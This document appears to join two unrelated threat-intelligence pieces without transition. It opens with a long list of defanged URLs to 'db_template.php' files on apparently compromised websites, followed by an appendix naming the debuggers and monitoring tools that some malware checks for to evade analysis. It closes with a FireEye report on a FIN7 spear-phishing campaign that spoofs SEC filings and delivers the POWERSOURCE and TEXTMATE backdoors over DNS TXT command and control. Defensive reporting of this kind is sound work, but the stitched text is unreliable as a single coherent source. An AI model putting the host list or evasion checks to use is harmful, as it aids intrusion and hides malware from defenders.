hxxp://apobiomedix[.]ca//db_template.php

hxxp://anythinglah[.]info//db_template.php

hxxp://aniroleplay[.]net//db_template.php

hxxp://www.allcopytoners[.]com//db_template.php

hxxp://alphaobring[.]com//db_template.php

hxxp://www.galwayprimary[.]co.za//db_template.php

hxxp://alnuzha[.]org/en/db_template.php

hxxps://ancient-wisdoms[.]com//db_template.php

hxxp://amazingenergysavings[.]net//db_template.php

hxxp://gvs[.]com[.]pk/font-awesome/db_template.php

hxxp://geetransfers[.]co.za/font-awesome/db_template.php

hxxp://carlagrobler[.]co.za/components/db_template.php

hxxp://amazingashwini[.]com//db_template.php

hxxp://aminearserver[.]es//db_template.php

hxxp://lensofafrica[.]co.za//db_template.php

hxxp://greenacrestf[.]co.za/video/db_template.php

hxxp://www.tonaro[.]co.za//db_template.php

hxxp://alephit2[.]biz/kitzz/db_template.php

hxxp://lppaportal[.]org.ls//db_template.php

hxxp://alkousy[.]com//db_template.php

hxxp://ambulatorioveterinariocalusco[.]com/img/common/db_template.php

hxxp://fragranceoil[.]co.za//db_template.php

hxxp://www.eloquent[.]co.za/nweb2/db_template.php

hxxp://chrishanicdc[.]org/wpimages/db_template.php

hxxp://ahc.me[.]uk//db_template.php

hxxp://www.britishasia-equip[.]co[.]uk//db_template.php

hxxp://always-beauty[.]ch//db_template.php

hxxps://www.ancamamara[.]com/wp-admin/db_template.php

hxxp://entracorntrading[.]co.za//db_template.php

hxxp://www.alexjeffersonconsulting[.]com/wp-includes/db_template.php

hxxp://americabr[.]com.br//db_template.php

hxxp://andrew-snyder[.]net/bootstrap/db_template.php

hxxp://signsoftime[.]co.za//db_template.php

hxxp://aperta-armis[.]org//db_template.php

hxxp://absfinancialplanning[.]co.za/images/db_template.php

hxxp://charispaarl[.]co.za//db_template.php

hxxp://indlovusecurity[.]co.za//db_template.php

hxxp://alcafricandatalab[.]com//db_template.php

hxxp://amor-clubhotels[.]com//db_template.php

hxxp://mokorotlocorporate[.]com//db_template.php

hxxp://apppriori[.]com//db_template.php

hxxp://luxconprojects[.]co.za//db_template.php

hxxp://androidphonetips[.]com/wp-includes/db_template.php

hxxp://angel-seeds[.]com.ua/catalog/db_template.php

hxxp://alissanicolai[.]com/assets/db_template.php

hxxps://www.amateurastronomy[.]org//db_template.php

hxxp://aiofotoevideo[.]com//db_template.php

hxxp://www.amika.hr//db_template.php

hxxp://comfortex[.]co.za/php/db_template.php

hxxp://deepgraphics[.]co.za//db_template.php

hxxps://agiledepot[.]com//db_template.php

hxxp://almatours[.]gr//db_template.php

hxxp://analystcnwang[.]com//db_template.php

hxxp://www.malboer[.]co.za/trendy1/db_template.php

hxxp://sefikengfarm.co.ls//db_template.php

hxxp://www.antirughenaturale[.]com/wp-admin/db_template.php

hxxp://passright[.]co.za//db_template.php

hxxp://seismicfactory[.]co.za//db_template.php

hxxp://alessandroalessandrini[.]it//db_template.php

hxxps://aquabsafe[.]com//db_template.php

hxxp://amatikulutours[.]com/tmp/db_template.php

hxxp://ganitis[.]gr//db_template.php

hxxp://aleenasgiftbox[.]com/admin/db_template.php

hxxps://allusdoctors[.]com/themes/db_template.php

hxxp://alainsaffel[.]com//db_template.php

hxxp://www.ariehandomri[.]com//db_template.php

hxxp://aquaneeka[.]co[.]uk/wp-includes/db_template.php

hxxp://itengineering[.]co.za/gatewaydiamond/db_template.php

hxxp://alldomains-crm[.]com/bubblegumpopcorn[.]com/wp-admin/db_template.php

hxxp://www.albertamechanical[.]ca//db_template.php

hxxp://alchamel[.]info//db_template.php

hxxps://almokan[.]net/wp-includes/db_template.php

hxxp://jakobieducation[.]co.za//db_template.php

hxxps://arc-sec[.]net//db_template.php

hxxp://ldams[.]org.ls/supplies/db_template.php

hxxp://menaboracks[.]co.za/tmp/db_template.php

hxxp://www.getcord[.]co.za//db_template.php

hxxp://boardaffairs[.]com//db_template.php

hxxp://capetownway[.]co.za//db_template.php

hxxp://cloudhostdesign[.]com//db_template.php

hxxp://hartenboswaterpark[.]co.za/templates/db_template.php

hxxp://fccorp[.]co.za/php/db_template.php

hxxp://angar68[.]com//db_template.php

hxxp://www.dws-gov[.]co.za//db_template.php

hxxp://alwahahweb[.]com//db_template.php

hxxp://anuragcreatives[.]com//db_template.php

hxxp://embali[.]co.za//db_template.php

hxxp://albertaedmonton[.]com/widgetstyles/db_template.php

hxxp://altosdefontana[.]com//db_template.php

hxxp://airfanhydro[.]net//db_template.php

hxxps://www.alexponcet[.]com/wp-includes/db_template.php

hxxp://agropecuariavilarica[.]com.br//db_template.php

hxxps://www.amazingbuyrd[.]com/admin/db_template.php

hxxp://cdxtrading[.]co.za//db_template.php

hxxp://interafricaconsulting[.]com/wpimages/db_template.php

hxxp://glgroup[.]co.za/images/db_template.php

hxxp://hisandherskennels[.]co.za/php/db_template.php

hxxp://alemaohost[.]com/lotosorg[.]com/db_template.php

hxxp://isibaniedu[.]co.za/admin/db_template.php

hxxp://dianakleyn[.]co.za/layouts/db_template.php

hxxp://themotoringcalendar[.]co.za//db_template.php

hxxp://www.loansonhomes[.]co.za//db_template.php

hxxp://edgesecurity[.]co.za/js/db_template.php

hxxp://highschoolsuperstar[.]co.za/files/db_template.php

hxxp://www.ambientproperty[.]com//db_template.php

hxxp://animationshowreel[.]co.il//db_template.php

hxxp://cafawelding[.]co.za/font-awesome/db_template.php

hxxp://apalawyers.pt//db_template.php

hxxp://www.edesignz[.]co.za//db_template.php

hxxp://centuryacademy[.]co.za/css/db_template.php

hxxps://ambyenta.hr//db_template.php

hxxp://ceramica[.]co.za//db_template.php

hxxp://www.alfredoposada[.]com//db_template.php

hxxp://anastasovsworkshop[.]com/wp-includes/db_template.php

hxxp://allisonplumbing[.]com/wp-includes/db_template.php

hxxp://eastrandmotorlab[.]co.za/fleet/db_template.php

hxxp://angelsongroup[.]com/wp-includes/db_template.php

hxxp://www.mikimaths[.]com//db_template.php

hxxp://hjb-racing[.]co.za/htdocs/db_template.php

hxxp://anotherpartofme[.]com/wp-includes/db_template.php

hxxp://www.andreabelfi[.]com//db_template.php

hxxp://www.iancullen[.]co.za//db_template.php

hxxp://alaskamaterials[.]com//db_template.php

hxxp://jeanetteproperties[.]co.za//db_template.php

hxxp://www.digitalmedia[.]co.za//db_template.php

hxxp://www.rejoicetheatre[.]com//db_template.php

hxxps://alterwebhost[.]com//db_template.php

hxxp://bc-u[.]co[.]uk//db_template.php

hxxp://dpscdgkhan.edu[.]pk/shopping/db_template.php

hxxp://edgeforensic[.]co.za//db_template.php

hxxp://willpowerpos[.]co.za//db_template.php

hxxp://antrismode[.]com/wp-includes/db_template.php

hxxp://colenesphotography[.]co.za/modules/db_template.php

hxxp://anthaigroup.vn//db_template.php

hxxps://alphainvestors[.]com.au//db_template.php

hxxps://aliart[.]nl//db_template.php

hxxps://allmantravel[.]com/thumbs/db_template.php

hxxp://fbrvolume[.]co.za//db_template.php

hxxp://amordegato[.]es/storefront/db_template.php

hxxp://agylub[.]com//db_template.php

hxxp://www.khotsonglodge.co.ls//db_template.php

hxxp://ampli5yd[.]com//db_template.php

hxxps://animeok[.]co.il//db_template.php

hxxps://arbeidsrechtcentrum[.]nl//db_template.php

hxxp://erniecommunications[.]co.za/js/db_template.php

hxxp://promechtransport[.]co.za/scripts/db_template.php

hxxp://centuriongsd[.]co.za//db_template.php

hxxp://www.agencesylvieleclerc[.]com//db_template.php

hxxp://delcom[.]co.za//db_template.php

hxxps://aleoestudio[.]com/gallonature/db_template.php

hxxp://oftheearthphotography[.]com/www/db_template.php

hxxp://h-dubepromotions[.]co.za//db_template.php

hxxp://www.alessioborzuola[.]com/downloads/db_template.php

hxxp://crystaltidings[.]co.za//db_template.php

hxxp://funeralbusinesssolution[.]com/email_template/db_template.php

hxxp://funisalodge[.]co.za/data1/db_template.php

hxxp://experttutors[.]co.za//db_template.php

hxxps://www[.]cartridgecave[.]co.za//db_template.php

hxxp://ecs-consult[.]com//db_template.php

hxxp://www.animationinisrael[.]org/tmp_images/db_template.php

hxxp://gideonitesprojects[.]com//db_template.php

hxxp://hybridauto[.]co.za/photography/db_template.php

hxxp://africanpixels.zar.cc//db_template.php

hxxp://ryanchristiefurniture[.]co.za//db_template.php

hxxp://evansmokaba[.]com/evansmokaba[.]com/thabiso/db_template.php

hxxp://almeriahotelja[.]com/dk/db_template.php

hxxp://al3abflash[.]biz//db_template.php

hxxp://www.fun4kidz[.]co.za//db_template.php

hxxp://alsharhanstore[.]com//db_template.php

hxxp://www[.]infratechconsulting[.]com//db_template.php

hxxp://algihad[.]com/assets/db_template.php

hxxp://americanwestmedia[.]com//db_template.php

hxxp://charliewestsecurity[.]co.za//db_template.php

hxxp://beehiveholdingszar[.]co.za//db_template.php

hxxp://analyticalfootball[.]com//db_template.php

hxxp://apiiination[.]com/leadership/db_template.php

hxxps://ahelicoptermom[.]com/wp-includes/db_template.php

hxxp://servicebox[.]co.za//db_template.php

hxxp://globalelectricalandconstruction[.]co.za/wpscripts/db_template.php

hxxps://aquo[.]in//db_template.php

hxxps://www.alfransia[.]com/wp-admin/db_template.php

hxxp://www.icsswaziland[.]com//db_template.php

hxxp://aiko.pro//db_template.php

hxxps://alceharfield[.]com//db_template.php

hxxp://indocraft[.]co.za/test/db_template.php

hxxp://allegiancesecurity[.]org//db_template.php

hxxp://sullivanprimary[.]co.za//db_template.php

hxxp://www.apmequestrian[.]com//db_template.php

hxxps://alphawaves[.]org/wp-admin/db_template.php

hxxp://www.alexandrasternin[.]com/illustration/db_template.php

hxxp://www.daleth[.]co.za//db_template.php

hxxp://jwseshowe[.]co.za/assets/db_template.php

hxxp://winagainstebola[.]com//db_template.php

hxxp://anubandh[.]in//db_template.php

hxxp://www.alexanderhomestead[.]com//db_template.php

hxxp://alfatek-intelligence[.]com//db_template.php

hxxp://www.aprendiendoencasa[.]com/wp-includes/db_template.php

hxxp://alorabrownies[.]com/wp-admin/db_template.php

hxxp://andrasadam[.]com/tothildiko/wp-includes/db_template.php

hxxp://cazochem[.]co.za/cazochem/db_template.php

hxxp://debnoch[.]com/image/db_template.php

hxxp://hmholdings360[.]co.za//db_template.php

hxxp://iinvest4u[.]co.za//db_template.php

hxxp://burgercoetzeeattorneys[.]co.za//db_template.php

hxxp://anngrigphoto[.]com//db_template.php

hxxp://alchemistasonida[.]com//db_template.php

hxxp://anahera[.]biz/admin/db_template.php

hxxp://h-u-i[.]co.za/heiren/db_template.php

hxxp://insta-art[.]co.za//db_template.php

hxxp://muallematsela[.]com//db_template.php

hxxp://aguasdecastilla[.]com/uploads/db_template.php

hxxp://www.arabgamenetwork[.]com//db_template.php

hxxps://arhiepiscopiabucurestilor[.]ro/templates/db_template.php

hxxp://amruthavana[.]com/blog/db_template.php

hxxp://digitalblue[.]co.za//db_template.php

hxxps://www.alvarezarquitectos[.]com//db_template.php

hxxp://buboobioinnovations[.]co.za/wpimages/db_template.php

hxxp://andrewsbisom[.]com//db_template.php

hxxp://www.m-3[.]co.za//db_template.php

hxxp://beesrenovations[.]co.za/images/db_template.php

hxxps://www.apliety[.]co.il/wp-includes/db_template.php

hxxp://alchamelup[.]org/htdocs/db_template.php

hxxp://benonicoc[.]co.za/resources/db_template.php

hxxps://al-mostakbl[.]com//db_template.php

hxxp://alchimiegrafiche[.]net/bbdelteatro/db_template.php

hxxp://andrespazsoldan[.]com//db_template.php

hxxp://in2accounting[.]co.za//db_template.php

hxxp://aipa[.]ca//db_template.php

hxxp://alphabee.fund/PHPMailer_5.2.0/db_template.php

hxxp://arabsdeals[.]com//db_template.php

hxxps://archiotronic[.]com/wp-includes/db_template.php

hxxp://capewindstrading[.]co.za//db_template.php

hxxps://althurayaa[.]com//db_template.php

hxxp://jhphotoedits[.]co.za//db_template.php

hxxp://cloudhub.co.ls/modules/db_template.php

hxxp://apironco[.]com/wp-includes/db_template.php

hxxp://digital-cameras-south-africa[.]co.za/script/db_template.php

hxxp://ahmadhasanat[.]com//db_template.php

hxxp://alexrocchi[.]com//db_template.php

hxxp://aljaadi[.]com//db_template.php

hxxps://www.engeltjieakademie[.]co.za//db_template.php

hxxp://annabelle[.]nl/next/db_template.php

hxxp://juniorad[.]co.za/vendor/db_template.php

hxxp://animationpulse[.]net//db_template.php

hxxp://angloglot[.]com//db_template.php

hxxp://agricolavicuna.cl//db_template.php

hxxp://alexelgy[.]com/allaccess/db_template.php

hxxp://www.centreforgovernance[.]uk//db_template.php

hxxp://www.aliandconsulting[.]com//db_template.php

hxxp://balaateen[.]co.za/less/db_template.php

hxxp://aleksicdunja[.]com//db_template.php

hxxp://arestihome[.]com//db_template.php

hxxp://am1int.fcomet[.]com/wp1/db_template.php

hxxp://anet-international-group[.]com/shop/db_template.php

hxxp://courtesydriving[.]co.za/js/db_template.php

hxxp://annaplebanek[.]com//db_template.php

hxxp://agencijazemil[.]com//db_template.php

hxxp://airminumtiro[.]com//db_template.php

hxxp://www.androidwikihow[.]com//db_template.php

hxxp://alisabyfinna[.]com//db_template.php

hxxp://rma-law[.]co.za//db_template.php

hxxp://amari[.]ro/components/db_template.php

hxxp://anxiousandunstoppable[.]com//db_template.php

hxxp://www.buhlebayoacademy[.]com//db_template.php

hxxp://arabellajo[.]com/wp/wp-includes/db_template.php

hxxp://blackthorn[.]co.za//db_template.php

hxxp://alaqaba[.]com/dnsarabia[.]com/db_template.php

hxxp://airesis.blog/wp-admin/db_template.php

hxxp://www.aptibet[.]org//db_template.php

hxxp://alecattic[.]com/wp-includes/db_template.php

hxxp://anglero[.]com//db_template.php

hxxp://getabletravel[.]co.za/wpscripts/db_template.php

hxxp://www.allwestdental[.]com/wp-includes/db_template.php

hxxp://printernet[.]co.za//db_template.php

hxxp://genesisbs[.]co.za//db_template.php

hxxp://allsporthealthandfitness[.]com//db_template.php

hxxp://www.humorcarbons[.]com//db_template.php

hxxp://intelligentprotection[.]co.za//db_template.php

hxxp://amazethings[.]com//db_template.php

hxxp://incoso[.]co.za/images/db_template.php

hxxp://www.antoanetapalikarska[.]com//db_template.php

hxxps://www.alteaparadise[.]com/wp-includes/db_template.php

hxxp://amirmenahem[.]com//db_template.php

hxxp://isound[.]co.za//db_template.php

hxxp://www.alestilorachel[.]com//db_template.php

hxxp://alcfm[.]net/wp-admin/db_template.php

hxxp://www.acer-parts[.]co.za//db_template.php

hxxp://www.gsmmid[.]com//db_template.php

hxxp://skhaleni[.]co.za//db_template.php

hxxps://amiici.vision//db_template.php

hxxps://andihaas[.]at/wp-includes/db_template.php

hxxp://www.albertaprimebeef[.]com//db_template.php

hxxps://www.appster[.]it/wp-includes/db_template.php

hxxp://amofoundation[.]org/wp-includes/db_template.php

hxxp://iqra[.]co.za/pub/db_template.php

hxxp://thecompasssolutions[.]co.za//db_template.php

hxxp://archwaycarpetscrm[.]co[.]uk//db_template.php

hxxp://iggleconsulting[.]com//db_template.php

hxxps://angel-blanco[.]net/wp-includes/db_template.php

hxxps://anotherdayinparadise[.]ca//db_template.php

hxxp://www.bitp[.]co.za//db_template.php

hxxp://cupboardcure[.]co.za/vendor/db_template.php

hxxp://all2wedding[.]com/wp-includes/db_template.php

hxxp://allianz[.]com.pe/wp-admin/db_template.php

hxxp://amiehepperlin[.]com//db_template.php

hxxps://www.amighini[.]it/webservice/db_template.php

hxxp://broken-arrow[.]co.za//db_template.php

hxxp://www.ihlosiqs-pm[.]co.za//db_template.php

hxxp://alisimple[.]si/wp-includes/db_template.php

hxxp://allthat[.]social//db_template.php

hxxp://www.amphibiblechurch[.]com//db_template.php

hxxp://bestencouragementwords[.]com//db_template.php

hxxp://alayhamtechnologies[.]com//db_template.php

hxxps://alaskanharvestseafood[.]com/backup/db_template.php

hxxps://www.air-mag[.]ro//db_template.php

hxxp://get-paid-for-online-survey[.]com//db_template.php

hxxp://www.antc[.]ch/wp-includes/db_template.php

hxxp://firstchoiceproperties[.]co.za//db_template.php

hxxp://habibtextiles[.]pk//db_template.php

hxxp://fsproperties[.]co.za/engine1/db_template.php

hxxp://diegemmerkat[.]co.za//db_template.php

hxxp://molepetravel.co.ls//db_template.php

hxxp://mmetl[.]co.za//db_template.php

hxxp://altrablog[.]com//db_template.php

hxxp://abrahamseed[.]co.za//db_template.php

hxxp://www.amerindgen[.]com/author/admin1/db_template.php

hxxp://altcoinaddict[.]com//db_template.php

hxxp://iiee.edu[.]pk//db_template.php

hxxp://cmhts[.]co.za/resources/db_template.php

hxxp://domesticguardians[.]co.za/Banner/db_template.php

hxxps://amishcountryfurnishings[.]com//db_template.php

hxxps://allday[.]gr//db_template.php

hxxp://www.alinn-u-yin[.]com//db_template.php

hxxps://www.allin-chain[.]com//db_template.php

hxxps://www.anatapackaging[.]com/vendors/db_template.php

hxxp://alexcelts[.]com/wp/db_template.php

hxxp://www.allstylus[.]com.br//db_template.php

hxxp://www.algom-law[.]com//db_template.php

hxxp://ambiances-toiles[.]fr//db_template.php

Appendix

Security Tools Checked on the Machine

win32_remote

win64_remote64

ollydbg

ProcessHacker

tcpview

autoruns

autorunsc

filemon

procmon

regmon

procexp

idaq

idaq64

ImmunityDebugger

Wireshark

dumpcap

HookExplorer

ImportREC

PETools

LordPE

dumpcap

SysInspector

proc_analyzer

sysAnalyzer

sniff_hit

windbg

joeboxcontrol

joeboxserver

FIN7 Spear Phishing Campaign Targets Personnel Involved in SEC Filings

In late February 2017, FireEye as a Service (FaaS) identified a spear phishing campaign that appeared to be targeting personnel involved with United States Securities and Exchange Commission (SEC) filings at various organizations. Based on multiple identified overlaps in infrastructure and the use of similar tools, tactics, and procedures (TTPs), we have high confidence that this campaign is associated with the financially motivated threat group tracked by FireEye as FIN7.

FIN7 is a financially motivated intrusion set that selectively targets victims and uses spear phishing to distribute its malware. We have observed FIN7 attempt to compromise diverse organizations for malicious operations – usually involving the deployment of point-of-sale malware – primarily against the retail and hospitality industries.

Spear Phishing Campaign

All of the observed intended recipients of the spear phishing campaign appeared to be involved with SEC filings for their respective organizations. Many of the recipients were even listed in their company’s SEC filings. The sender email address was spoofed as EDGAR <filings@sec.gov> and the attachment was named “Important_Changes_to_Form10_K.doc” (MD5: d04b6410dddee19adec75f597c52e386). An example email is shown in Figure 1.

Figure 1: Example of a phishing email sent during this campaign

We have observed the following TTPs with this campaign:

  • The malicious documents drop a VBS script that installs a PowerShell backdoor, which uses DNS TXT records for its command and control. This backdoor appears to be a new malware family that FireEye iSIGHT Intelligence has dubbed POWERSOURCE. POWERSOURCE is a heavily obfuscated and modified version of the publicly available tool DNS_TXT_Pwnage. The backdoor uses DNS TXT requests for command and control and is installed in the registry or Alternate Data Streams. Using DNS TXT records to communicate is not an entirely new finding, but it should be noted that this has been a rising trend since 2013 likely because it makes detection and hunting for command and control traffic difficult.
  • We also observed POWERSOURCE being used to download a second-stage PowerShell backdoor called TEXTMATE in an effort to further infect the victim machine. The TEXTMATE backdoor provides a reverse shell to attackers and uses DNS TXT queries to tunnel interactive commands and other data. TEXTMATE is “memory resident” – often described as “fileless” malware. This is not a novel technique by any means, but it’s worth noting since it presents detection challenges and further speaks to the threat actor’s ability to remain stealthy and nimble in operations.
  • In some cases, we identified a Cobalt Strike Beacon payload being delivered via POWERSOURCE. This particular Cobalt Strike stager payload was previously used in operations linked to FIN7.
  • We observed that the same domain hosting the Cobalt Strike Beacon payload was also hosting a CARBANAK backdoor sample compiled in February 2017. CARBANAK malware has been used heavily by FIN7 in previous operations.
Victims

Thus far, we have directly identified 11 targeted organizations in the following sectors:

  • Financial services, with different victims having insurance, investment, card services, and loan focuses
  • Transportation
  • Retail
  • Education
  • IT services
  • Electronics

All these organizations are based in the United States, and many have international presences. As the SEC is a U.S. regulatory organization, we would expect recipients of these spear phishing attempts to either work for U.S.-based organizations or be U.S.-based representatives of organizations located elsewhere. However, it is possible that the attackers could perform similar activity mimicking other regulatory organizations in other countries.

Implications

We have not yet identified FIN7’s ultimate goal in this campaign, as we have either blocked the delivery of the malicious emails or our FaaS team detected and contained the attack early enough in the lifecycle before we observed any data targeting or theft.  However, we surmise FIN7 can profit from compromised organizations in several ways. If the attackers are attempting to compromise persons involved in SEC filings due to their information access, they may ultimately be pursuing securities fraud or other investment abuse. Alternatively, if they are tailoring their social engineering to these individuals, but have other goals once they have established a foothold, they may intend to pursue one of many other fraud types.

Previous FIN7 operations deployed multiple point-of-sale malware families for the purpose of collecting and exfiltrating sensitive financial data. The use of the CARBANAK malware in FIN7 operations also provides limited evidence that these campaigns are linked to previously observed CARBANAK operations leading to fraudulent banking transactions, ATM compromise, and other monetization schemes.

Community Protection Event

FireEye implemented a Community Protection Event – FaaS, Mandiant, Intelligence, and Products – to secure all clients affected by this campaign. In this instance, an incident detected by FaaS led to the deployment of additional detections by the FireEye Labs team after FireEye Labs Advanced Reverse Engineering quickly analyzed the malware. Detections were then quickly deployed to the suite of FireEye products.

The FireEye iSIGHT Intelligence MySIGHT Portal contains additional information based on our investigations of a variety of topics discussed in this post, including FIN7 and the POWERSOURCE and TEXTMATE malware. Click here for more information.